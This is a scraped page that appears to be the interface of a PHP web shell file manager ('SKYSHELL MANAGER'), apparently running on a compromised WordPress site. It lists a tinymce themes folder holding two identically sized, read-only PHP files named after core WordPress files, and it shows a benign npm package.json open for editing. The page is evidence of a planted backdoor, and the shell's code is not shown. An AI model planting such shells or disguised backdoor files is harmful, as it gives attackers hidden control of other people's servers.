📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "_from": "randombytes@2.0.3", "_id": "randombytes@2.0.3", "_inBundle": false, "_integrity": "sha1-Z0yZdgkBw8QRJ3GjHlIdw0nMCew=", "_location": "/@budibase/cli/randombytes", "_phantomChildren": {}, "_requested": { "type": "version", "registry": true, "raw": "randombytes@2.0.3", "name": "randombytes", "escapedName": "randombytes", "rawSpec": "2.0.3", "saveSpec": null, "fetchSpec": "2.0.3" }, "_requiredBy": [ "/@budibase/cli/randomstring" ], "_resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.0.3.tgz", "_shasum": "674c99760901c3c4112771a31e521dc349cc09ec", "_spec": "randombytes@2.0.3", "_where": "/usr/local/lib/node_modules/@budibase/cli/node_modules/randomstring", "author": "", "browser": "browser.js", "bugs": { "url": "https://github.com/crypto-browserify/randombytes/issues" }, "bundleDependencies": false, "deprecated": false, "description": "random bytes from browserify stand alone", "devDependencies": { "phantomjs": "^1.9.9", "standard": "^3.3.0", "tap-spec": "^2.1.2", "tape": "^3.0.3", "zuul": "^3.7.2" }, "homepage": "https://github.com/crypto-browserify/randombytes", "keywords": [ "crypto", "random" ], "license": "MIT", "main": "index.js", "name": "randombytes", "repository": { "type": "git", "url": "git+ssh://git@github.com/crypto-browserify/randombytes.git" }, "scripts": { "local": "zuul --local --no-coverage -- test.js", "phantom": "zuul --phantom -- test.js", "test": "standard && node test.js | tspec" }, "version": "2.0.3" }
Save